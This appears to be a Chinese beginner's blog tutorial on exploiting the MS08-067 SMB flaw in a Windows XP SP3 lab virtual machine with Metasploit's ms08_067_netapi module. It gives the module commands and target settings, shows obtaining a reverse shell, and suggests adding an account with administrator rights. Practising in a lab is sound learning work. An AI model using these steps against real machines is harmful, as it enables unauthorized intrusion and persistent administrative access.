本人只是热爱web安全的一名小白,文章只是为了技术提升而分享!大牛勿喷!
本文所使用到的环境工具:
1、win XP SP3 英文版
下载地址:http://pan.baidu.com/s/1qYjNWBi
解压直接用虚拟机打开就能使用开机密码123456
2、Metasplot (我使用的是基于pentest Box里面集成的MSF)
教程开始:
首先我们先用虚拟机打开靶机查看靶机IP地址
然后确认本机能ping通靶机!
然后打开pentest Box 运行MSF
然后查找我们所需要的漏洞模块,这里我们是针对的MS08-067漏洞所以直接输入search MS08-067
使用此EXP 命令; use exploit/windows/smb/ms08_067_netapi
使用命令show options查看该模块的使用选项
设置攻击目标主机IP地址 set RHOST 192.168.220.129
端口默认445
然后运行run
成功获取到反弹shell
执行命令shell
看到这个界面就知道了 自己添加个账户提升为管理员登陆就OK了!
好了 教程就到这里 大神勿喷!谢谢!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
